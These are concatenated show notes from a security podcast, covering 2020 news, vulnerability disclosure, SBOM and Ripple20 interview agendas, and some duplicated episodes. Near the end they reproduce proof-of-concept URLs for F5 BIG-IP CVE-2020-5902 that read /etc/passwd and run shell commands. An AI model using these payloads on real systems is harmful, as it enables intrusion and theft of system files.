anyone hit all 3s, or is that a pipedream? Incentive "no legal action will be taken". People want money… not tours, not 10-point font. How do you convince 'good' bug writers to want to help you for a 'thank you'? Should incentive be a 'Level 3' or would you consider it not ready for prime-time? https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/ Vuln reporting Lots of Twitter fodder of companies that handle vuln disclosure poorly, even folks say that you shouldn't bother and deal with a 3rd party. If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?Security.txt? Clearly stated bugs@ or Security@ (and not buried in 3 point font in the privacy policy, or ToS) SLA to reply to all bugs? Standardized disclosure form for discoveries? Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf ISO 29147:2018 - $150 USD https://www.iso.org/standard/72311.html ISO 30111:2019 - $95 USD https://www.iso.org/standard/69725.html ISO 27034-7:2018 - $150 USD https://www.iso.org/standard/66229.html Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

FIND US NOW ON AMAZON MUSIC! https://music.amazon.com/podcasts/51b7da82-c223-4de4-8fc1-d1c3dd61984a/Brakeing-Down-Security-Podcast Shout to the organizers of Bsides Edmonton, Alberta, Canada for a great conference! Amanda's social media take over this week Bryan's plumbing story (A tale of 3 toilets) https://www.infosecurity-magazine.com/news/corporate-data-on-personal-devices/ https://www.infosecurity-magazine.com/news/fatality-after-hospital-hacked/ https://fortune.com/2020/09/18/ransomware-police-investigating-hospital-cyber-attack-death/ Zerologon - https://nakedsecurity.sophos.com/2020/09/17/zerologon-hacking-windows-servers-with-a-bunch-of-zeros/ US govt orders federal agencies to patch dangerous Zerologon bug by Monday, 21 September 11:59 EDT) https://www.zdnet.com/article/us-govt-orders-federal-agencies-to-patch-dangerous-zerologon-bug-by-monday/ Tweet mentioning not needing to reset passwords for access:https://twitter.com/_dirkjan/status/1307662409436475392 https://twitter.com/MsftSecIntel/status/1308941504707063808?s=20 Linux malware (drovorub) https://www.tripwire.com/state-of-security/featured/drovorub-malware/ https://www.zdnet.com/article/this-surprise-linux-malware-warning-shows-that-hackers-are-changing-their-targets/ Rampant Kitten's arsenal includes Android malware that bypasses 2FA https://exploit.kitploit.com/2020/09/tp-link-cloud-cameras-ncxxx-bonjour.html https://www.infosecurity-magazine.com/news/former-pm-passport-phone-hacker/ https://threatpost.com/bluetooth-spoofing-bug-iot-devices/159291/ Good stuff: https://compass-security.com/fileadmin/Datein/Research/White_Papers/lateral_movement_detection_basic_gpo_settings_v1.0.pdf Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

https://www.kitploit.com/2020/05/web-hackers-weapons-collection-of-cool.html https://www.ehackingnews.com/2020/09/hackers-attack-gaming-industry-sell.html https://www.secjuice.com/windows-10-penetration-testing-os/ Nice to see stories about using Win10 as a pentest platform. Was always a PITA to update Kali or whatever. @secjuice One reason I enjoyed Dave Kennedy's 'pentester framework' --brbr https://www.ehackingnews.com/2020/09/a-new-security-vulnerability-discovered.html https://www.zdnet.com/article/irs-offers-grants-to-contractors-able-to-trace-cryptocurrency-transactions-across-the-blockchain/ https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support https://kbondale.wordpress.com/2020/09/13/lets-flatten-five-agile-fallacies/ Speak more to the need for process improvement. Trying to embrace a new 'agile' methodology is bunk. Find inefficiencies, work to improve those, collect metrics to show improvements. https://www.linkedin.com/pulse/intersection-change-management-project-paula-alsher/ Lead to an excellent segue to our book club. By the book, https://brakesec.com/adkar - used books on Amazon going for less than $10 USD Thursday 17, 2020 - 7pm Pacific FEEDBACK: "Gotta say I'm really enjoying this book. It has my mind moving in so many directions - our team's change initiatives and desires, the agency-level initiatives, other change leaders in our org and their tools/techniques and successes/failures." https://securityscorecard.com/blog/the-cisos-guide-to-reporting-cybersecurity-to-the-board This came up during a discussion on our Slack. Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonSmile: https://brakesec.com/smile #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

WWFH Class: (Ms. Berlin) "Breaching the Cloud" @dafthack https://www.blackhillsinfosec.com/breaching-the-cloud-perimeter-w-beau-bullock/ https://wildwesthackinfest.com/wwhf-at-secure-wv/ IWCE 2020 panel: "Being a thought leader" ADKAR class Book Club: 03 September 2020 7pm: https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504/ref=sr_1_1?dchild=1&keywords=ADKAR&qid=1598543747&sr=8-1 TLS cert life is 13 months now (397 day) than now:https://www.bleepingcomputer.com/news/technology/you-have-two-days-left-to-purchase-2-year-tls-ssl-certificates/ Tesla and FBI prevented $1 million ransomware hack at Gigafactory Nevada https://electrek.co/2020/08/27/tesla-fbi-prevent-ransomware-hack-gigafactory-nevada/ Garmin Hack https://www.privateinternetaccess.com/blog/the-garmin-hack-could-have-been-a-disastrous-large-scale-privacy-breach/ https://hackerone.com/reports/783877 https://www.reddit.com/r/netsec/comments/iifh3r/remote_code_execution_in_slack_desktop_apps/ Reserved Campsites for InfosecCampout 2021 MHH Feel Good Boxes https://lovethesecookies.com/ Trojan - "not my fault" Segfaults and then injects DLLs @seaseceast

Ms. Berlin: Tabletop D&D exercise Blumira is hiring https://www.blumira.com/career/lead-backend-engineer/ Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce NTIA.gov - National Telecommunications and Information Administration https://www.ntia.gov/sbom SBOM guidance Healthcare SBOM PoC - https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf Allan's talk at Bsides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ Questions (more may be added during the show, depending on answers given) What is NTIA? What is SBOM? Why do we need one? Is it poor communications between vendors? Is there any difference between "Software transparency" and "Software bill of materials"? How do you make an SBOM? What data formats make sharing easier? What does a company do with an SBOM? Where in the development (hardware or software) would you be creating an SBOM? You mention in your BSSF talk about 'how detailed it should be'. Can you give us an example of a high level SBOM, versus a more detailed one? Does it become a risk/reward effort concerning detail? IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them? How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ? As we saw with RIPPLE20, many companies don't know what they have. How would SBOM help keep another RIPPLE20 from happening? Rob Graham's blog post highlighted that vulns like HeartBleed would not have been stopped. How does this help us track potential vulns? Sharing information Best way to share information about IoT components? Could an information sharing org (ISAC) track these more readily? vendor assessments: Vendor does not have an SBOM, any specific questions we might ask that will allow an org to get more resolution into a potential vendor? Interesting feedback from NTIA's RFC Other SBOM types (clonedx, openbom, FDA's CBOM) Companies are out there creating SBOM, other government agencies have SBOM implementations. How do we keep this from being the XKCD "927" issue? https://xkcd.com/927/ non-US implementations of SBOM? How do we get our companies to implement these? SBOM could easily be something that could give hackers a lot of information about your org and depending on the information contained, I could see why you might not want to get super specific… Thoughts? What is a 'Bill of Materials'? "A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product." SBOM - Definition As of November 2019, an estimated 126 different platforms - https://www.postscapes.com/internet-of-things-platforms/ NTIA did an RFC on "promoting the sharing of Supply Chain Security Risk Information" https://www.ntia.gov/federal-register-notice/2020/request-comments-promoting-sharing-supply-chain-security-risk https://www.ntia.gov/federal-register-notice/2020/comments-promoting-sharing-supply-chain-security-risk-information-0 Secure and Trusted Communications Network Act of 2019 (Act) - Calling it "CBOM" Other groups working on similar: FDA https://www.fda.gov/media/119933/download SPDX: LInux Foundation:https://spdx.org/licenses/ OpenBOM https://medium.com/@openbom/friday-discussion-why-boms-are-essential-for-the-iot-platform-e2c4bd397afd https://github.com/CycloneDX/specification https://www.fda.gov/medical-devices/digital-health/cybersecurity https://www.fda.gov/regulatory-information/search-fda-guidance-documents/guidance-content-premarket-submissions-software-contained-medical-devices Medical device IR Playbook: https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf Companies are helping to get "CBOM" for devices: ""It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA," said MedCrypt CEO Mike Kijewski in a news release" https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/ SBOM doesn't work in DevOps: https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops Intoto software development: https://www.intotosystems.com/ 510k process: https://www.drugwatch.com/fda/510k-clearance/ Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonSmile: https://brakesec.com/smile #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/Brakes

Ms. Berlin: Tabletop D&D exercise Blumira is hiring https://www.blumira.com/career/lead-backend-engineer/ Allan Friedman - Director of Cybersecurity Initiatives, NTIA, US Department of Commerce NTIA.gov - National Telecommunications and Information Administration https://www.ntia.gov/sbom SBOM guidance Healthcare SBOM PoC - https://www.ntia.gov/files/ntia/publications/ntia_sbom_healthcare_poc_report_2019_1001.pdf Allan's talk at Bsides San Francisco: https://www.youtube.com/watch?v=9j1KYLfklMQ Questions (more may be added during the show, depending on answers given) What is NTIA? What is SBOM? Why do we need one? Is it poor communications between vendors? Is there any difference between "Software transparency" and "Software bill of materials"? How do you make an SBOM? What data formats make sharing easier? What does a company do with an SBOM? Where in the development (hardware or software) would you be creating an SBOM? You mention in your BSSF talk about 'how detailed it should be'. Can you give us an example of a high level SBOM, versus a more detailed one? Does it become a risk/reward effort concerning detail? IoT device creators are working with their 3rd parties, who are working with their 3rd parties. Someone at home with a webcam cannot easily ask for an SBOM, so how do we convince device makers to want to ask for them? How do you get your 3rd party that is a multi-national corporation to supply you with the information you need to ? As we saw with RIPPLE20, many companies don't know what they have. How would SBOM help keep another RIPPLE20 from happening? Rob Graham's blog post highlighted that vulns like HeartBleed would not have been stopped. How does this help us track potential vulns? Sharing information Best way to share information about IoT components? Could an information sharing org (ISAC) track these more readily? vendor assessments: Vendor does not have an SBOM, any specific questions we might ask that will allow an org to get more resolution into a potential vendor? Interesting feedback from NTIA's RFC Other SBOM types (clonedx, openbom, FDA's CBOM) Companies are out there creating SBOM, other government agencies have SBOM implementations. How do we keep this from being the XKCD "927" issue? https://xkcd.com/927/ non-US implementations of SBOM? How do we get our companies to implement these? SBOM could easily be something that could give hackers a lot of information about your org and depending on the information contained, I could see why you might not want to get super specific… Thoughts? What is a 'Bill of Materials'? "A bill of materials (BOM) is a comprehensive inventory of the raw materials, assemblies, subassemblies, parts and components, as well as the quantities of each, needed to manufacture a product. In a nutshell, it is the complete list of all the items that are required to build a product." SBOM - Definition As of November 2019, an estimated 126 different platforms - https://www.postscapes.com/internet-of-things-platforms/ NTIA did an RFC on "promoting the sharing of Supply Chain Security Risk Information" https://www.ntia.gov/federal-register-notice/2020/request-comments-promoting-sharing-supply-chain-security-risk https://www.ntia.gov/federal-register-notice/2020/comments-promoting-sharing-supply-chain-security-risk-information-0 Secure and Trusted Communications Network Act of 2019 (Act) - Calling it "CBOM" Other groups working on similar: FDA https://www.fda.gov/media/119933/download SPDX: LInux Foundation:https://spdx.org/licenses/ OpenBOM https://medium.com/@openbom/friday-discussion-why-boms-are-essential-for-the-iot-platform-e2c4bd397afd https://github.com/CycloneDX/specification https://www.fda.gov/medical-devices/digital-health/cybersecurity https://www.fda.gov/regulatory-information/search-fda-guidance-documents/guidance-content-premarket-submissions-software-contained-medical-devices Medical device IR Playbook: https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf Companies are helping to get "CBOM" for devices: ""It can take anywhere from six months to a year for a new medical device to get its 510(k) clearance from the FDA," said MedCrypt CEO Mike Kijewski in a news release" https://www.medicaldesignandoutsourcing.com/medcrypt-acquires-medisao-in-medtech-cybersecurity-deal/ SBOM doesn't work in DevOps: https://cybersecurity.att.com/blogs/security-essentials/software-bill-of-materials-sbom-does-it-work-for-devsecops Intoto software development: https://www.intotosystems.com/ 510k process: https://www.drugwatch.com/fda/510k-clearance/

WISP.org donation page: https://wisporg.z2systems.com/np/clients/wisporg/donation.jsp Mick Douglas (@bettersafetynet on Twitter) Powercat: https://github.com/besimorhino/powercat Netcat in a powershell environment https://blog.rapid7.com/2018/09/27/the-powershell-boogeyman-how-to-defend-against-malicious-powershell-attacks/ https://www.hackingarticles.in/powercat-a-powershell-netcat/ Defenses against powercat? LolBins: https://www.cynet.com/blog/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/ Sigma ruleset: https://www.nextron-systems.com/2018/02/10/write-sigma-rules/#:~:text=Sigma%20is%20an%20open%20standard,grep%20on%20the%20command%20line. ElasticSearch bought Endgame; https://www.elastic.co/about/press/elastic-announces-intent-to-acquire-endgame https://krebsonsecurity.com/2020/07/thinking-of-a-cybersecurity-career-read-this/ Twitter DM to @bettersafetynet:Hey... I wanna talk about @hrbrmstr's tweet on the show tonight as well... https://twitter.com/hrbrmstr/status/1287442304593276929 My thinking is if Cisco and others didn't try to intentionally downplay vulnerabilities by announcing them on a Friday, would we be more likely to patch sooner? Also, greater need for testing of patches to ensure that 80% of your workforce rely on that technology now. What's worse? Patching on a Friday evening (after several hours explaining the vuln to a manager), and then having it fuck something up so you're up at crack of dawn Monday troubleshooting something missed Friday night because testing was rushed/not conducted because the CEO can't access email? I have thoughts, I've added this to the show note google doc. https://www.reddit.com/r/netsec/comments/hwaj6f/nmap_script_fot_cve20203452/ -- nmap PoC script? Embargoed vulns… Getting management buy-in to patch

WISP.org PSA at 35m56s - 37m 19s Agenda:Bio/background Why are you here (topic discussion) What is the Linux Security Summit North America https://grsecurity.net/ Questions from the meeting invite: This only affects people who want to use a custom kernel, correct? This doesn't affect you if you are running bog-standard linux (debian, gentoo, Ubuntu) right? What options do people have in cloud environments? Does the use of microservices make grsecurity less worthwhile? You mentioned ARM 64 processors in your first slide as making significant security functionality strides. With Apple and Microsoft going to ARM based processors, what are some things you feel need to be added to the kernel to shore up Linux for ARM, since some purists enjoy an Apple device with Linux on it? https://www.youtube.com/watch?v=F_Kza6fdkSU - Youtube Video https://grsecurity.net/10_years_of_linux_security.pdf -- pdf slides https://lwn.net/Articles/569635/ - Definition of KASLR LTS kernels moved from 2 years to 6 years - why? 6 years is pretty much "FOREVER" in software development. Patches get harder to backport, or worse; Could introduce new vulnerabilities Project Treble: https://www.computerworld.com/article/3306443/what-is-project-treble-android-upgrade-fix-explained.html LTSI: https://ltsi.linuxfoundation.org/ 4.4 XLTS is available until Feb2022 - If fixes and all bugs haven't been backported (1,250 security fixes aren't in the latest stable 4.4 kernel) What are the "safe" kernels? Has anything changed since the presentation you gave earlier in July 2020 Syzkaller Let's discuss Slide 27 (what are those tems?) "Is it improving code quality, or Is it making people lazier and more reliant on a tool to check code?" Slide 29 audio, you mention that you use Syzkaller… why do you use it? Exploitation Trends Attackers still don't care about whether a vulnerability has a CVE assigned or not Don't many vulnerabilities require some work to get to the kernel? And why should they work to get to the kernel? https://www.bleepingcomputer.com/news/security/rewards-of-up-to-500-000-offered-for-freebsd-openbsd-netbsd-linux-zero-days/ 500K IF the kernel vuln affects major distros (Centos, Ubuntu) https://resources.whitesourcesoftware.com/blog-whitesource/top-10-linux-kernel-vulnerabilities Why does Zerodium payout for kernel vulns lower than application vulns? Would it be fair to say that getting root/persistence is all that matters and you don't need to worry about the kernel to do so? Many of the new security features are protecting against bad programming practices? So by adding all these things, who are you securing systems against? Bad actors, or devs who employ poor coding measures? Why do you think we see lower adoption rates of security Problem solving: Halvar Flake: http://addxorrol.blogspot.com/2020/03/before-you-ship-security-mitigation.html If we have time… Threat models in a kernel Where do they go in the development lifecycle? If kernel dev is an open environment, what precipitates the need for a kernel mitigation threat model Is there an example somewhere that we can see? What is the format? Methodology? Do you think static code analysis of the kernel is worthwhile at all? Absolutely! We do a lot of it, including via the analysis resulting from compiling with LLVM, as well as via specific static analysis GCC plugins of our own. OK, what about the large amount of false positives the analyzers generate? Do you get around with your custom plugins? Also do you use the analyzers included with Clang and GCC v.10 or 3rd products? That's usually a property of the analysis itself -- some can have large false positive issues, others not. Ideally we try to limit that for the plugins we write (we just recently added one helpful for some kind of NULL ptr dereferences this week). My understanding is the public now also has access to the Coverity reports for the kernel? As far as GCC versions, yes we test with all versions from 4.5 to 10. What do you think of proposed XPFO patch? https://lwn.net/Articles/784839/ The performance profile is a big problem, and it doesn't address that the same attack can be performed in a different way that it wouldn't handle (that limitation is also mentioned in the original paper). So we haven't invested in it at all with our own work. how about git sha-256 security measures ? Not my domain of expertise, but sounds like a good idea. What is the status of KASLR on non-Intel architectures? ARMv7/v8? It exists there as well, and is shipped in Android. It's also recently been added for PowerPC. What dynamic analysis/testing tools do you use for the kernel? We have a couple racks of hardware, including some new AMD EPYC2 systems dedicated entirely to testing and syzkaller fuzzing. We have syzkaller in place (along with backports of functionality to improve its functionality/coverage) for all kernels we support, as well as a good mix of physical/VM systems for major distros, and automated build/boot/functionality/regressio

Whitepaper: https://www.jsof-tech.com/ripple20/ [blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/ Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing Agenda: Part 1: Background on the report Why is it called RIPPLE20? What's the RIPPLE about? Communications with Treck (and it's Japanese counterpart) Were you surprised about the reaction? Positive or negative? Types of systems affected? IoT Embedded systems SCADA What precipitated the research? What difficulties did you face in finding these vulns? Deadlines? What tools were used for analysis? (I think you mentioned Forescout --brbr) What kind of extensibility are we talking about? TCP sizes? What did JSOF gain by doing this? What were the initial benefits of using the TCP/IP stack? Speed? Size? Do these vulns affect other TCP/IP stacks? Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits? Updates since the report was released? Are your vulns such that they can be detected online? Part 2: Supply chain issues What should companies do when they don't know what's in their own tech stack? https://csrc.nist.gov/CSRC/media/Projects/Supply-Chain-Risk-Management/documents/briefings/Workshop-Brief-on-Cyber-Supply-Chain-Best-Practices.pdf Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible "Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected]." BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver Vendor Contact How many organizations are affected by these vulnerabilities? Are some devices and systems more vulnerable than others? How many are you still investigating to see if they are affected? What's the initial email look like when you tell a company "you're vulnerable to X"? Who are you dealing with initially? What is your delivery when you're routed to non-technical people? How did you tailor your initial response when you learned of the position of the person? Lessons Learned: What would you have done differently next time? Any additional tooling that you'd have used? BlackHat talk: 05 August What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org? https://cambridgewirelessblog.wordpress.com/2016/05/18/supply-chain-security-and-compliance-for-embedded-devices-iot/ https://blog.shi.com/solutions/embedded-hardware-supply-chain-attacks-embedded-system-attacks-how-to-stay-safe/ http://www.intrinsic-id.com/wp-content/uploads/2018/02/2016-A-Platform-Solution-for-Secure-Supply-Chain-and-Chip-Cycle-Management-Computer-Volume-49-Issue-8-Aug.-2016-Joseph-P.-Skudlarek-Tom-Katsioulas-Michael-Chen-%E2%80%93-Mentor-Graphics..pdf https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users https://www.bbc.com/news/business-32716802#:~:text=Japanese%20car%20giants%20Toyota%20and,March%202003%20and%20November%202007. Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Whitepaper: https://www.jsof-tech.com/ripple20/ [blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/ Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing Agenda: Part 1: Background on the report Why is it called RIPPLE20? What's the RIPPLE about? Communications with Treck (and it's Japanese counterpart) Were you surprised about the reaction? Positive or negative? Types of systems affected? IoT Embedded systems SCADA What precipitated the research? What difficulties did you face in finding these vulns? Deadlines? What tools were used for analysis? (I think you mentioned Forescout --brbr) What kind of extensibility are we talking about? TCP sizes? What did JSOF gain by doing this? What were the initial benefits of using the TCP/IP stack? Speed? Size? Do these vulns affect other TCP/IP stacks? Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits? Updates since the report was released? Are your vulns such that they can be detected online? Part 2: Supply chain issues What should companies do when they don't know what's in their own tech stack? https://csrc.nist.gov/CSRC/media/Projects/Supply-Chain-Risk-Management/documents/briefings/Workshop-Brief-on-Cyber-Supply-Chain-Best-Practices.pdf Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible "Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at [email protected]." BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver Vendor Contact How many organizations are affected by these vulnerabilities? Are some devices and systems more vulnerable than others? How many are you still investigating to see if they are affected? What's the initial email look like when you tell a company "you're vulnerable to X"? Who are you dealing with initially? What is your delivery when you're routed to non-technical people? How did you tailor your initial response when you learned of the position of the person? Lessons Learned: What would you have done differently next time? Any additional tooling that you'd have used? BlackHat talk: 05 August What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org? https://cambridgewirelessblog.wordpress.com/2016/05/18/supply-chain-security-and-compliance-for-embedded-devices-iot/ https://blog.shi.com/solutions/embedded-hardware-supply-chain-attacks-embedded-system-attacks-how-to-stay-safe/ http://www.intrinsic-id.com/wp-content/uploads/2018/02/2016-A-Platform-Solution-for-Secure-Supply-Chain-and-Chip-Cycle-Management-Computer-Volume-49-Issue-8-Aug.-2016-Joseph-P.-Skudlarek-Tom-Katsioulas-Michael-Chen-%E2%80%93-Mentor-Graphics..pdf https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users https://www.bbc.com/news/business-32716802#:~:text=Japanese%20car%20giants%20Toyota%20and,March%202003%20and%20November%202007. Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

1st: WISP.org PSA from Rachel Tobac (@racheltobac) & @wisporg talking about #shareTheMicInCyber #SAML PAN-OS: https://twitter.com/RyanLNewington/status/1278074919092289537 F5 vulnerability: https://www.wired.com/story/f5-big-ip-networking-vulnerability/ https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/ F5 Mitigation (if patching is not immediately possible): https://twitter.com/TeamAresSec/status/1280590730684256258 Redirect 404 / https://twitter.com/wugeej/status/1280008779359125504 - Tweet with PoC for the LFI and RCE F5 Big-IP CVE-2020-5902 LFI and RCE LFI https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd or /etc/hosts or /config/bigip.license RCE https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami How to cope in a no-win situation:https://twitter.com/datSecuritychic/status/1280527467569008640 Semicolon in bash: https://docstore.mik.ua/orelly/unix3/upt/ch28_16.htm#:~:text=When%20the%20shell%20sees%20a,once%20at%20a%20single%20prompt.

Thank you to Marcus Carey for his excellent guidance and leadership this week. Cognizant breach: https://www.ehackingnews.com/2020/06/cognizant-reveals-employees-data.html Maze ransomware write-up: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/ https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html https://docs.paloaltonetworks.com/pan-os/9-0/pan-os-admin/authentication/authentication-types/saml PAN-OS CVE 2020-2021 - We have been made aware of a serious issue with SAML on Palo Alto Networks PAN-OS We strongly encourage our customers to upgrade to one of the following versions : PAN-OS 8.1.15 PAN-OS 9.0.9 PAN-OS 9.1.3 and greater This is a critical vulnerability with the only mitigation being to either turn OFF SAML or to upgrade the PAN-OS. A CVE will be released on Monday :: CVE-2020-2021 https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language

